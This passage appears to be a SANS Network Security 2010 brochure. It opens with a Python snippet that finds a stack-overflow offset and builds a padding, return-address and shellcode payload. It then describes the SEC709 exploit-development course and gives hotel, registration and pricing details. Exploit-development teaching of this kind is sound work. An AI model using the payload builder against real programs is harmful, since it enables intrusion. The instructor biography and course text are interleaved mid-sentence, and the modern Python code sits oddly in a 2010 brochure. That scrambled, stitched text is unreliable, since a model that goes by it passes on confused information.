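    return struct.unpack("<I", payload[ret_at:ret_at + 4])[0]


def build_exploit(offset, new_eip, shellcode):
    """Once the offset is known: padding, then the address, then the payload."""
    return b"A" * offset + struct.pack("<I", new_eip) + shellcode


if __name__ == "__main__":
    pat = pattern_create(200)
    eip = simulate_overflow(pat)
    off = pattern_offset(pat, eip)
    print(f"EIP=0x{eip:08x} -> offset {off}")
    print(build_exploit(off, 0x41414141, b"\xcc" * 4).hex())   # 0x41414141 is a placeholder address
```

The same lookup works for any register or stack slot that caught the pattern, which is how the distance to an SEH handler pointer (709.4) or to a saved frame pointer is measured. On a real target, verify the offset with a second run that places a recognisable marker (0x41414141 above) exactly where the return address belongs before spending time on a ret2libc or SEH chain.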

Certified Instructor: Stephen Sims
Stephen Sims is an information security consultant currently working for Wells Fargo in San Francisco, California. He has spent the past eight years in San Francisco working for several large financial institutions on network and systems security, penetration testing, exploitation development, and risk assessment and management. Prior to San Francisco, Stephen worked in the Baltimore/DC area as a network security engineer for companies such as General Motors and Sylvan Prometric. He is one of only a handful of

709.3 Advanced Linux Exploitation and Introduction to Windows*
Beginning with understanding format strings and their purpose, we then progress to discovering format string vulnerabilities and what types of attacks can be performed. This is followed by a format string exercise with the goal of taking control of a process. The next section focuses on heap exploitation followed by writing your own shellcode, including an exercise of writing shellcode to spawn a shell on Linux systems. We then change our focus from Linux over to Windows and take a tour of symbol resolution from a Windows perspective. We’ll take a look at the assembly syntax and basic process debugging. This is followed by analyzing the method in which the Windows OS manages memory in various segments and many of the protections added from XP to Vista.
Topics: Abusing the Unlink() Macro on the Linux OS; Overwriting C and C++ Function Pointers; Identifying Format String Vulnerabilities; Taking Control of a Process Via a Format String Exploit; Understanding Shellcode; Writing Efficient Shellcode by Removing Null Bytes and Register Optimization; Understanding Symbol Resolution with the PE/COFF Object File Format; Understanding the Difference Between Intel and AT&T x86 Assembly Format; Basic Debugging with Ollydbg; Understanding Modern OS and Memory Protections on Windows

709.4 Windows Stack and Heap Exploitation*
On day four we start off by discovering a remote vulnerability on a Windows system through fuzzing. Once the vulnerability is discovered, you’ll use a debugger to find the exact location of the vulnerability and learn how to take control of the process. We then add in and bypass protections added to Windows XP SP2&3 and Vista. We will look at Windows heap exploitation, including methods to abuse the Process Environment Block (PEB) and other constructs to gain control of a process. We move from there into browser-based exploitation and how to increase the chances of exploitation through heap spraying. The day ends with looking at Windows shellcode and how it differs from Linux.
Topics: Using a Debugger to Analyze a Program; Basic Fuzzing to Discover Vulnerabilities; Abusing the Windows Stack Implementation; Abusing Structured Exception Handling (SEH) to Gain Control of a Program; Abusing the SafeSEH and DEP Controls Added to Windows XP SP2/3; Defeating Hardware Enforced DEP; Exploiting the
Process Environment Block (PEB) to Gain Program Control; Analyzing a Browser-based Vulnerability and Use Heap
individuals who holds the GIAC Spraying to Increase Success; Understanding Windows Shellcode and DLL Resolution
Security Expert (GSE) Certifica-
tion and also helps to author
709.5 Client-Side Exploitation and Patch Reversing*
Day five is an advanced day on Microsoft patch reversal and client-side exploitation. It is well known that
and maintain the current attackers download Microsoft patches as soon as they are available on “Patch Tuesday” of each month.
version of the exam. He is a Other vendors experience the same problem. The attacker’s goal is to reverse engineer the patches to
locate the code changes, making it possible to quickly identify the vulnerability. Exploit code is often
SANS certified instructor and generated within days, or even hours after discovery. Day five walks through the techniques used
the course author of SANS’ to perform reversing and binary diffing. Once the vulnerability is located, you will walk through
debugging and exploit generation of a client-side attack.
first and only 700-level course,
Topics: Using IDA Pro to Reverse Engineer Microsoft Patches; Using the BinDiff Tool to Identify Code
SEC709: Developing Exploits Changes; Improve Microsoft Stack and Heap Exploitation Skills; Vulnerability Discovery in Less
Obvious Places; Understand and Develop Client-Side Exploits
for Penetration Testers and
Security Researchers. Stephen 709.6 Capture the Flag*
Day six is a full day of Capture the Flag (CTF) exercises. There will be various types of Register at
also holds the CISSP, CISA, and
vulnerabilities to discover and exploit with the goal of capturing flags. Utilizing all www.sans.org/
Network Offense Professional of the knowledge gained throughout the course, you will work independently network-security-2010
(NOP) certifications, amongst or as a team to polish your skills and capture the most flags.

others. *This course is available to Security 709 participants only. SANS Network Security 2010
September 19 - 29, 2010 67
Hosted
Five-Day Program • Mon, Sept 20 - Fri, Sept 24, 2010 • 9:00am - 6:00pm
35 CPE Credits • Laptop Required • Instructor: Manu Paul

Who Should Attend
• Software architects
• Software engineers/designers
• Software development managers
• Requirements analysts
• Project managers
• Business and IT managers
• Auditors
• Developers and coders
• Security specialists
• Auditors and quality assurance managers
• Application owners

It’s no secret that security is not being addressed from a holistic perspective throughout the software lifecycle.
Some 70% of all security breaches are application related, equating to more than 226 million records being disclosed and fines reaching astronomical amounts. Together we have a solution that establishes industry standards and instills best practices in the software lifecycle (SLC).

The (ISC)2 five-day CSSLP® CBK Education Program is the exclusive way to learn security best practices and industry standards for the software lifecycle – critical information to a CSSLP. This is where you will learn tools and processes on how security should be built into each phase of the software lifecycle. It will also detail security measures that need to take place beginning with the requirement phase, through software design, all the way through software testing, and ultimately disposal. This will ensure you’re properly prepared to take on the constantly evolving vulnerabilities exposed in software development. Each software stakeholder is responsible for certain phase(s) of the SLC, but all phases must have security built into them. CSSLP is for all the stakeholders involved in the process. Each of the seven CSSLP Domains (www.isc2.org/csslp-certification.aspx) covers how to build security into the different phases.

The comprehensive (ISC)2 CSSLP CBK Education program covers the following domains:
• Secure Software Concepts - security implications in software development
• Secure Software Requirements - capturing security requirements in the requirements gathering phase
• Secure Software Design - translating security requirements into application design elements
• Secure Software Implementation/Coding - unit testing for security functionality and resiliency to attack, and developing secure code and exploit mitigation
• Secure Software Testing - integrated QA testing for security functionality and resiliency to attack
• Software Acceptance - security implication in the software acceptance phase
• Software Deployment, Operations, Maintenance, and Disposal - security issues around steady state operations and management of software

“The course contains pertinent information that I can immediately use at work.”
-DAVID TATUM, FISERV, INC.

Download a brochure to learn more about the CSSLP:
http://www.isc2.org/uploadedFiles/Landing_Pages/with_form/CSSLP%20Prof%20Web.pdf

Please note that the price of tuition does NOT include the CSSLP exam.
http://www.isc2.org/uploadedFiles/Certification_Programs/exam_pricing.pdf

Host: (ISC)2 CSSLP
(ISC)2® is the globally recognized Gold Standard for certifying information security professionals. Founded in 1989, (ISC)2® has certified nearly 60,000 information security professionals in 135 countries. (ISC)2® issues the Certified Information Systems Security Professional (CISSP®) and related concentrations, Certification and Accreditation Professional (CAP®), and Systems Security Certified Practitioner (SSCP®) credentials to those meeting necessary competency requirements. http://www.isc2.org
Future SANS Training Events

SANS Rocky Mountain 2010
July 12-17, 2010 • Denver
www.sans.org/rocky-mountain-2010
MGT414 • MGT512 • SEC401 • SEC503 • SEC560 • SEC566 • FOR408 • And More

SANS Boston 2010
August 2-8, 2010 • Boston
www.sans.org/boston-2010
AUD507 • MGT512 • SEC401 • SEC504 • SEC505 • SEC542 • SEC566 • FOR408 • And More

SANS Portland 2010
August 23 - 28, 2010 • Portland, OR
www.sans.org/portland-2010
MGT414 • SEC501 • SEC504 • FOR408

SANS Virginia Beach 2010
August 29 - September 3, 2010 • Virginia Beach
www.sans.org/virginia-beach-2010
MGT512 • SEC401 • SEC503 • SEC504 • SEC560 • SEC566 • SEC709 • FOR558 • And More

SANS Network Security 2010
September 19-29, 2010 • Las Vegas
www.sans.org/network-security-2010
AUD507 • MGT414 • MGT525 • SEC301 • SEC401 • SEC502 • SEC503 • SEC504 • SEC505 • SEC506 • SEC509 • SEC542 • SEC557 • SEC560 • SEC617 • SEC709 • FOR408 • FOR508 • FOR558 • FOR563 • FOR610 • And More

SANS Chicago 2010
October 25-31, 2010 • Chicago
www.sans.org/chicago-2010

SANS Tysons Corner 2010
Fall, 2010 • Tysons Corner
www.sans.org/tysons-corner-2010

SANS San Antonio 2010
November 13-20, 2010 • San Antonio
www.sans.org/san-antonio-2010

SANS Cyber Defense Initiative 2010
December 10-16, 2010 • Washington, DC
www.sans.org/cyber-defense-initiative-2010

Dates, locations, and courses offered are subject to change. For up-to-date information, visit www.sans.org.
SANS Network Security 2010 will be located at
Caesars Palace
43570 Las Vegas Blvd. • Las Vegas, NV 89109
Web site: http://www.caesarspalace.com
Reservations: 1-800-634-6661

SPECIAL RATES
A special discount rate of $192 S/D will be honored based on space availability. Government per diem rooms are available with proper ID; you will need to call reservations and ask for the SANS government rate. These rates include high speed Internet in your room.
Make your reservations now as this special rate is only available through Wednesday, September 1, 2010.
NOTE: You must mention that you are attending the SANS Institute training event to get the discounted rate.
The resort will require a major credit card to guarantee your reservation. To cancel your reservation, you must notify the resort at least 72 hours before your planned arrival date.

Welcome to the most prestigious resort in the world. From the shops of world-renowned designers like Valentino and Louis Vuitton to the celebrity clientele at PURE nightclub, you’ll discover legendary shopping and nightlife at Caesars Palace, plus a world of luxury at our extraordinary swimming pools and spa.
Caesars Palace wants to lavish you with all the amenities that will make your stay with us one you’ll always remember. Discover indulgence beyond expectation at Qua Baths & Spa, featuring never before seen amenities like Roman baths, a dry-heat Laconium room and a stunning, snow-filled Arctic Ice room. Caesars Palace is also the home of celebrity stylist Michael Boychuck, “colorist to the stars.” Every salon in town he’s touched has become a must-visit destination, and now Color, a Salon by Michael Boychuck is exclusively at Caesars Palace.
At the Garden of the Gods Pool Oasis, graceful fountains and classically inspired statuary surround three large swimming pools and two outdoor whirlpool spas so you can relax with friends around sparkling waters.
After exploring all that our spa, salon, and pools have to offer, you can shop at more than 120 stores in two elegant settings. The names on the storefronts are legendary, and the merchandise inside is the best the world has to offer. From Cartier and Roberto Cavalli to Salvatore Ferragamo, you can browse through the world’s finest stores at the Forum Shops and Appian Way.
Then, cap off your night at PURE, our remarkable club that sets new standards for Las Vegas nightlife. Owned in part by Celine Dion, Shaquille O’Neal, Andre Agassi and Steffi Graf, PURE is three stylish venues in one, including a VIP room, a dance floor with progressive DJs and a large outdoor patio with cascading waterfalls, walls of fire and breathtaking views of the surrounding Strip.

Amtrak offers a 10% discount off the lowest available rail fare to Las Vegas, NV. Please check the Web site for new code: www.sans.org/network-security-2010/location.php
To book your reservation call Amtrak at 1 (800) 872-7245 or contact your local travel agent. Conventions cannot be booked via Internet. This offer is not valid on Auto Train or Acela service. Offer valid with Sleepers, Business Class, or First Class seats with payment of the full applicable accommodation charges. Fare is valid on Metroliner service for all departures seven days a week, except for holiday blackouts.

AVIS is proud to offer special rates for SANS Network Security 2010. Make your reservations now and don’t forget to use your special discount code: J945620. www.avis.com

Weather Conditions
September in Las Vegas is pleasant with highs around 95° and lows near 66°. For the latest weather conditions and forecast, please consult www.weather.com.

Top 5 reasons to stay at Caesars Palace
1 All SANS attendees receive complimentary high-speed Internet when booking in the SANS Block.
2 No need to factor in daily cab fees and the time associated with travel to alternate hotels.
3 By staying at Caesars Palace, you gain the opportunity to further network with your industry peers and remain in the center of the activity surrounding the conference.
4 SANS schedules morning and evening events at Caesars Palace that you won’t want to miss!
5 Everything is in one convenient location!
Dear Colleagues and Friends,
SANS Network Security 2010 is back in Las Vegas with more courses, night sessions, and special events than ever before! With SANS stationed in the middle of the world-famous Vegas strip, you will find world-famous attractions, shows, restaurants, and shopping all within walking distance. This city has so much more to offer than just gambling – come see for yourself!
The training event will be held at Caesars Palace (www.caesarspalace.com), which is an attraction in itself! This property features the Forum Shops with over 160 stores and 14 restaurants. The Garden of the Gods pool complex has just doubled in size. During SANS Network Security 2010, the hotel tentatively has informed us that the Coliseum will have performances by Jerry Seinfeld and Cher. The hotel also has various dining options from high-end celebrity restaurants and all-you-can-eat buffets to the Market Street Grill, a food court that is quite popular for a quick bite!
Caesars Palace has the largest square footage of any hotel on the strip. Since it will take approximately 10 minutes alone to get from the front door to your classroom, we advise staying inside the hotel. We also highly recommend you book early since we will not be able to guarantee our special group rate after the deadline. Most guest rooms at Caesars Palace are right next door to our classrooms, and you will not even need to walk through the casino. As an extra treat, you will receive complimentary high-speed Internet – but only if you book under the special SANS group rate.
Even though it will be warm outside, you still want to bring a jacket for the climate-controlled classrooms and cooler evenings. You will also want to check out the SANS Network Security 2010 program guide for all of the action-packed presentations, receptions, and events as well as the social board for student gatherings around the city. Please feel free to send me an e-mail at brian@sans.org for more recommendations of things to do in Las Vegas.
Our goal is to ensure that you have the best possible time at SANS Network Security 2010!
Brian Correia
Director, Business Development & Venue Planning

Five Reasons to Register
1. The best career move you will ever make!
That’s how one SANS alumnus described the IT security education and networking opportunities offered by SANS. Attending SANS Network Security 2010 is a way of investing in your career. To reap the maximum benefit, read the course descriptions carefully. Check out the five- and six-day courses plus a wide variety of one- to four-day skill-based short courses.
2. Why settle for second best?
If you want to increase your understanding of information security and become more effective in your job, you need to be trained by the best. “SANS provides by far the most in-depth security training with the true experts in the field as instructors,” says Mark Smith, Costco Wholesale.
3. Challenge yourself!
Consider attempting GIAC (Global Information Assurance Certification), the industry’s most respected technical security certification. GIAC is the only information security certification for advanced technical subject areas, including audit, intrusion detection, incident handling, firewalls and perimeter protection, forensics, hacker techniques, and Windows and Unix operating system security.
4. Become part of an elite group.
We’re referring to the group of technical, security-savvy professionals who have had hands-on training through SANS. Material taught in the SANS courses directly applies to real-world challenges in your IT environment. “Six days of training gave me six months of work to do,” says Steven Marscovetra of Norinchukin Bank. “It is amazing how much of the training I can apply immediately at work.”
5. Don’t miss out on a good opportunity!
This is your chance to make a great career move, be taught by the cream of the crop, challenge yourself, and become part of an elite group during a full week of IT security education and networking opportunities. Come prepared to learn; we will come prepared to teach.

Visit www.sans.org/network-security-2010 and register today!
How to Register
1. To register, go to www.sans.org/network-security-2010.
Select your course or courses and indicate whether you plan to test for GIAC certification. If the course is still open, the secure, online registration server will accept your registration. Sold-out courses will be removed from the online registration. We do not take registrations by phone.

2. Provide payment information.
Even if you do not want to submit your payment information online, still complete the online form! There is an option to submit credit card information for payment by fax or phone once the online form is completed and you have your invoice number.
SANS ACCEPTS ONLY US and CANADIAN FEDERAL GOVERNMENT PURCHASE ORDERS
If you normally use a PO and are not part of the federal government, please see our additional PO information on the tuition information page: www.sans.org/network-security-2010/tuition.php

3. Print your invoice.
If you need one, you must print YOUR OWN INVOICE at the end of the online registration process. The invoice will pop up automatically when the registration is successfully submitted. You may also access your invoice at https://portal.sans.org/history.

4. E-mail confirmation will arrive soon after you register.

Register Early and Save
Register & pay by 8/11/10: $400.00 discount
Register & pay by 8/25/10: $250.00 discount

Group Savings (Applies to tuition only)
15% discount if 12 or more people from the same organization register at the same time
10% discount if 8 - 11 people from the same organization register at the same time
5% discount if 4 - 7 people from the same organization register at the same time
To obtain a group discount, complete the discount code request form at www.sans.org/conference/discount.php prior to registering.

Get GIAC Certified!
• Only $499 when combined with SANS training
• Deadline to register is the last day of SANS Network Security 2010
• Price goes to $899 after deadline
• Register today at registration@sans.org!

Frequently Asked Questions
Frequently asked questions about SANS Training and GIAC Certification – the industry standard for security knowledge – are posted at www.giac.org/overview/faq.php.

Cancellation
You may substitute another person in your place at any time by sending an e-mail request to registration@sans.org or a fax request to 301-951-0140. There is a $300 cancellation fee per registration. Cancellation requests must be received by Wednesday, September 1, 2010, by fax or mail in order to receive a refund.
SANS TRAINING AND YOUR CAREER ROAD MAP

SECURITY CURRICULUM

Beginners
SEC301 Intro to Information Security (GISF, PG 21)
NOTE: If you have experience in the field, please consider our more advanced course – SEC401.
SEC401 SANS Security Essentials Bootcamp Style (GSEC, PG 44)

Incident Handling
SEC501 Advanced Security Essentials – Enterprise Defender (GCED, PG 46)
SEC504 Hacker Techniques, Exploits, and Incident Handling (GCIH, PG 52)
FOR508 Computer Forensic Investigations and Incident Response (GCFA, PG 28)
Additional Incident Handling Courses: SEC517: Cutting-Edge Hacking Techniques; SEC550: Information Reconnaissance: Competitive Intelligence and Online Privacy (PG 18); SEC577: Virtualization Security Fundamentals (PG 19)

Intrusion Analysis
SEC501 Advanced Security Essentials – Enterprise Defender (GCED, PG 46)
SEC502 Perimeter Protection In-Depth (GCFW, PG 48)
SEC503 Intrusion Detection In-Depth (GCIA, PG 50)

Penetration Testing
SEC540 VoIP Security
SEC542 Web App Pen Testing and Ethical Hacking (GWAPT, PG 60)
SEC560 Network Pen Testing and Ethical Hacking (GPEN, PG 62)
SEC617 Wireless Ethical Hacking, Pen Testing, and Defenses (GAWN, PG 64)
SEC709 Developing Exploits for Penetration Testers and Security Researchers (PG 66)
Additional Penetration Testing Courses: DEV538: Web App Pen Testing Immersion; SEC561: Network Penetration Testing: Maximizing the Effectiveness of Reports, Exploits, and Command Shells; SEC565: Data Leakage Prevention - In Depth (PG 17); SEC567: Power Packet Crafting with Scapy (PG 18); SEC580: Metasploit Kung Fu for Enterprise Pen Testing (PG 19)

System Administration
SEC501 Advanced Security Essentials – Enterprise Defender (GCED, PG 46)
SEC505 Securing Windows (GCWN, PG 54)
SEC506 Securing Linux/Unix (GCUX, PG 56)
SEC509 Securing Oracle (PG 58)
Additional System Administration Courses: SEC434: Log Management In-Depth; SEC531: Windows Command-Line Kung Fu; SEC546: IPv6 Essentials (PG 18); SEC556: Comprehensive Packet Analysis (PG 18); SEC564: Hacker Detection for System Administrators (PG 19)

Network and Application Security
SEC501 Advanced Security Essentials – Enterprise Defender (GCED, PG 46)
Additional Network and Application Security Courses: SEC440: 20 Critical Security Controls: Planning, Implementing, and Auditing; SEC566: Implementing & Auditing the Twenty Critical Security Controls - In-Depth (PG 20)

FORENSICS CURRICULUM
FOR408 Computer Forensic Essentials (PG 26)
FOR508 Computer Forensic Investigations and Incident Response (GCFA, PG 28)
FOR558 Network Forensics (PG 30)
FOR563 Mobile Device Forensics (PG 32)
FOR610 REM: Malware Analysis Tools & Techniques (GREM, PG 34)
Additional Forensics Courses: FOR526: Advanced Filesystem Recovery and Memory Forensics (PG 17)

APPLICATION SECURITY CURRICULUM
Design & Test: DEV522 Defending Web Applications Security Essentials (PG 22); SEC542 Web App Pen Testing and Ethical Hacking (GWAPT, PG 60); DEV534 Secure Code Review for Java Web Apps (Code Review)
Secure Coding: DEV530 Essential Secure Coding in Java/JEE; DEV543 Secure Coding in C & C++; DEV541 Secure Coding in Java/JEE (GSSP-JAVA, PG 15); DEV544 Secure Coding in .NET (GSSP-.NET); DEV545 Secure Coding in PHP (GSSP-PHP)
Additional Secure Coding Courses: DEV304: Software Security Awareness; DEV536: Secure Coding for PCI Compliance

AUDIT CURRICULUM
SEC301 Intro to Information Security (GISF, PG 21)
SEC401 SANS Security Essentials Bootcamp Style (GSEC, PG 44)
AUD507 Auditing Networks, Perimeters, and Systems (GSNA, PG 24)
Additional Audit Courses: AUD305: Technical Communication & Presentation Skills; AUD423: Training for the ISACA® CISA® Cert Exam; AUD429: IT Security Audit Essentials Bootcamp; AUD521: Meeting the Minimum: PCI/DSS 1.2: Becoming and Staying Compliant (PG 12); SEC440: 20 Critical Security Controls: Planning, Implementing, and Auditing; SEC566: Implementing & Auditing the Twenty Critical Security Controls - In-Depth (PG 20)

LEGAL CURRICULUM
SEC301 Intro to Information Security (GISF, PG 21)
LEG523 Legal Issues in Information Technology and Information Security (GLEG, PG 13)

MANAGEMENT CURRICULUM
SEC301 Intro to Information Security (GISF, PG 21)
SEC401 SANS Security Essentials Bootcamp Style (GSEC, PG 44)
MGT512 SANS Security Leadership Essentials For Managers with Knowledge Compression™ (GSLC, PG 40)
MGT414 SANS® +S™ Training Program for the CISSP® Certification Exam (GISP, PG 38)
MGT525 Project Management and Effective Communications for Security Professionals and Managers (GCPM, PG 42)
Additional Management Courses: MGT305: Technical Communication and Presentation Skills (PG 15); MGT404: Fundamentals of Information Security Policy (PG 16); MGT421: SANS Leadership and Management Competencies (PG 16); MGT432: Information Security for Business Executives; MGT438: How to Establish a Security Awareness Program; MGT570: Social Engineering Defense (PG 16)

GIAC certification available for courses indicated with GIAC acronyms.

SANS Network Security 2010 Registration Fees
Register online at www.sans.org/network-security-2010
NOTE: If you don’t wish to register online, please call 301-654-SANS(7267) 9:00am - 8:00pm (Mon-Fri) EST and we will fax or mail you an order form.

Job-Based Long Courses
Course | Paid by 8/11/10 | Paid by 8/25/10 | Paid after 8/25/10 | Add GIAC Cert | Add OnDemand
AUD507 Auditing Networks, Perimeters, and Systems | $3,445 | $3,595 | $3,845 | $499 | $399
DEV522 Defending Web Applications Security Essentials | $3,445 | $3,595 | $3,845 | | 
FOR408 Computer Forensic Essentials | $3,915 | $4,065 | $4,315 | | $399
FOR508 Computer Forensic Investigations and Incident Response | $3,645 | $3,795 | $4,045 | $499 | $399
FOR558 Network Forensics | $3,445 | $3,595 | $3,845 | | 
FOR563 Mobile Device Forensics | $3,625 | $3,775 | $4,025 | | 
FOR610 Reverse-Engineering Malware: Malware Analysis Tools and Techniques | $2,745 | $2,895 | $3,145 | $499 | $399
LEG523 Legal Issues in Information Technology and Information Security | $3,025 | $3,175 | $3,425 | $499 | $399
MGT414 SANS® +S™ Training Program for the CISSP® Certification Exam | $3,445 | $3,595 | $3,845 | $499 | $399
MGT512 SANS Security Leadership Essentials For Managers with Knowledge Compression™ | $3,895 | $4,045 | $4,295 | $499 | $399
MGT525 Project Management & Effective Communications for Security Professionals & Managers | $3,445 | $3,595 | $3,845 | $499 | 
SEC301 Intro to Information Security | $3,025 | $3,175 | $3,425 | $499 | $399
SEC401 SANS Security Essentials Bootcamp Style | $3,645 | $3,795 | $4,045 | $499 | $399
SEC501 Advanced Security Essentials – Enterprise Defender | $3,545 | $3,695 | $3,945 | $499 | $399
SEC502 Perimeter Protection In-Depth | $3,495 | $3,645 | $3,895 | $499 | $399
SEC503 Intrusion Detection In-Depth | $3,545 | $3,695 | $3,945 | $499 | $399
SEC504 Hacker Techniques, Exploits, and Incident Handling | $3,545 | $3,695 | $3,945 | $499 | $399
SEC505 Securing Windows | $3,495 | $3,645 | $3,895 | $499 | $399
SEC506 Securing Linux/Unix | $3,495 | $3,645 | $3,895 | $499 | $399
SEC509 Securing Oracle | $3,595 | $3,745 | $3,995 | | $399
SEC542 Web Application Penetration Testing and Ethical Hacking | $3,445 | $3,595 | $3,845 | $499 | $399
SEC560 Network Penetration Testing and Ethical Hacking | $3,895 | $4,045 | $4,295 | $499 | $399
SEC566 Implementing & Auditing the Twenty Critical Security Controls - In-Depth | $3,025 | $3,175 | $3,425 | | 
SEC617 Wireless Ethical Hacking, Penetration Testing, and Defenses | $3,595 | $3,745 | $3,995 | $499 | $399
SEC709 Developing Exploits for Penetration Testers and Security Researchers | $3,745 | $3,895 | $4,145 | | 
HOSTED Drive and Data Recovery Forensics | $3,625 | $3,775 | $4,025 | | 
HOSTED (ISC)2® Certified Secure Software Lifecycle Professional (CSSLP) CBK® Education Program | $2,745 | $2,895 | $3,145 | | 

Skill-Based Short Courses
Course | If taking a 5-6 day course | Paid by 8/11/10 | Paid by 8/25/10 | Paid after 8/25/10 | Add GIAC Cert | Add OnDemand
DEV541 Secure Coding in Java/JEE: Developing Defensible Applications | N/A | $2,645 | $2,795 | $3,045 | $499 | $399
FOR526 Advanced Filesystem Recovery and Memory Forensics | $575 | $995 | $995 | $995 | | $99
MGT305 Technical Communication and Presentation Skills for Security Professionals | $855 | $1,275 | $1,275 | $1,275 | | 
MGT404 Fundamentals of Information Security Policy | $855 | $1,275 | $1,275 | $1,275 | | $99
MGT421 SANS Leadership and Management Competencies | $675 | $1,095 | $1,095 | $1,095 | | $99
MGT570 Social Engineering Defense | $1,150 | $1,700 | $1,700 | $1,700 | | 
SEC546 IPv6 Essentials | $575 | $995 | $995 | $995 | | 
SEC550 Information Reconnaissance: Competitive Intelligence and Online Privacy | $575 | $995 | $995 | $995 | | $99
SEC556 Comprehensive Packet Analysis | $575 | $995 | $995 | $995 | | $99
SEC564 Hacker Detection for System Administrators | $1,150 | $1,700 | $1,700 | $1,700 | | 
SEC565 Data Leakage Prevention – In Depth | N/A | $2,645 | $2,795 | $3,045 | | 
SEC567 Power Packet Crafting with Scapy | $575 | $995 | $995 | $995 | | 
SEC577 Virtualization Security Fundamentals | $1,250 | $1,800 | $1,800 | $1,800 | | 
SEC580 Metasploit Kung Fu for Enterprise Pen Testing | $1,150 | $1,700 | $1,700 | $1,700 | | 

Individual Courses Available
Course | MON 9/20 | TUE 9/21 | WED 9/22 | THU 9/23 | FRI 9/24 | SAT 9/25
AUD507 | 507.1 | 507.2 & 507.3 | 507.4 | 507.5 | 507.6 | 
LEG523 | 523.1 | 523.2 | 523.3 | 523.4 | 523.5 | 
SEC301 | 301.1 | 301.2 | 301.3 | 301.4 | 301.5 | 
SEC401 | 401.1 | 401.2 | 401.3 | 401.4 | 401.5 | 401.6
SEC501 | 501.1 | 501.2 | 501.3 | 501.4 | 501.5 | 501.6
SEC503 | 503.1 | | | | | 
SEC504 | 504.1 | | | | | 
SEC505 | 505.1 | 505.2 | 505.3 | 505.4 | 505.5 | 505.6
SEC506 | 506.1 | 506.2 | 506.3 | 506.4 | 506.5 | 506.6

Individual Course Day Rates If Not Taking a Full Course
Days | Paid by 8/11/10 | Paid by 8/25/10 | Paid after 8/25/10
One Full Day | $1,325 | $1,325 | $1,325
Two Full Days | $2,050 | $2,050 | $2,050
Three Full Days | $3,000 | $3,000 | $3,000
Four Full Days | $3,250 | $3,250 | $3,250
Five Full Days | $3,800 | $3,800 | $3,800
Six Full Days | $4,350 | $4,350 | $4,350
Seven Full Days | $4,950 | $4,950 | $4,950
Eight Full Days | $5,550 | $5,550 | $5,550

REMINDER: When you register, please use the promo code located on the back cover.
training investment. Course topics include Implementing and Auditing the Twenty Critical Security Controls – In Depth, Virtualization Security Fundamentals, and much, much more! Many of the hottest new courses are selling out, so register today!

Networking is a hidden jewel at Network Security 2010! Where else will you meet others in your field or in your role who deal with the same exploits and challenges you do? Several networking opportunities are available at SANS Network Security 2010. Along with your course, you can attend the SANS@Night presentations, evening talks with keynote speakers like Lenny Zeltser and Jason Fossen, and our Vendor events. SANS Network Security 2010 Vendor Expo provides a look at solutions and vendor products that can help address your organization’s key security issues. In addition, we will be featuring Lunch & Learn sessions and Cocktail Briefs throughout this event so take advantage of these great networking opportunities.

Enhance your learning by attending the Legal Issues & PCI Compliance in Information Security Summit 2010 being held in conjunction with Network Security 2010.

The information technology industry changes daily, and the challenges you face are undoubtedly complex. If you know any key stakeholders in the security of your organization, take them to Las Vegas this fall. They’ll be glad they came!

It is our goal to help you get the most out of your SANS Network Security 2010 experience. If you have suggestions on how we can better help you find the information you need, then I would love to hear from you, stephen@sans.edu.

See you in Las Vegas!

Kind regards,
Stephen Northcutt
President
The SANS Technology Institute, a postgraduate computer security college

Register at www.sans.org/network-security-2010
At Caesar’s Palace

When you register, be sure to use the promo code on the back of this brochure. Those who do will receive a special invitation to the SANS Presidential Reception.

*Based on SC Magazine’s Best Professional Training Program Award 2010

Courses (continued):
Auditing Networks, Perimeters & Systems
Intrusion Detection In-Depth
Web App Penetration Testing and Ethical Hacking
…and more than 30 other courses in network and software security, forensics, legal, management, and IT audit.

SANS WhatWorks in Legal Issues and PCI Compliance in Information Security Summit is being held in conjunction with Network Security 2010 – Sept 22 - 29. www.sans.org/pci-legal-info-tech-summit-2010

Here is what a few of last year’s attendees had to say:

“Again, SANS has managed to take incredibly complicated material and make it easy to understand”
-MARC STOUFER, MEIJER

“I like the fact that this course contained no fluff. All the information was of benefit and no time was wasted”
-AMALIA DOMINGUEZ, NV ENERGY

“No other training has provided such instant value to me as a professional and to my company.”
-TERRY PACK, WELLPOINT

Five Tips to Get Approval for SANS Training

1. EXPLORE
• Read this brochure and note the courses that will enhance your role at your organization.
• Use the Roadmap to arm yourself with all the necessary materials to make a good case for attending a SANS training event.
• Note that the core, job-based courses can be complemented by short, skill-based courses of one or two days. We also offer deep discounts for bundled course packages. Consider a GIAC Certification, which will show the world that you have achieved proven expertise in your chosen field.

2. RELATE
• Show how recent problems or issues will be solved with the knowledge you gain from the SANS course.
• Promise to share what you’ve learned with your colleagues.

3. SAVE
• The earlier you sign up, the more you save, so explain the benefit of signing up early.
• Save even more with group discounts! See inside for details.

4. ADD VALUE
• Share with your boss that you can add value to your experience by meeting with network security experts - people who face the same type of challenges that you face every single day.
• Explain how you will be able to get and share great ideas on improving your IT productivity and efficiency.
• Enhance your SANS training experience with SANS@Night talks and the Vendor Expo, which are free and only available at live training events.
• Take advantage of the special SANS host hotel rate so you will be right where the action is!

5. ACT
• With the fortitude and initiative you have demonstrated thus far, you can confidently seek approval to attend SANS training!

Return on Investment: SANS training events are recognized as the best place in the world to get information security education. With SANS, you will gain significant return on investment (ROI) for your InfoSec investment. Through our intensive immersion classes, our training is designed to help your staff master the practical steps necessary for defending systems and networks against the most dangerous threats – the ones being actively exploited. Remember: SANS is your first and best choice for information and software security training. The SANS Promise is “You will be able to apply our information security training the day you get back to the office!”

Save $400 when you register for SANS NS2010 by August 11, 2010
www.sans.org/network-security-2010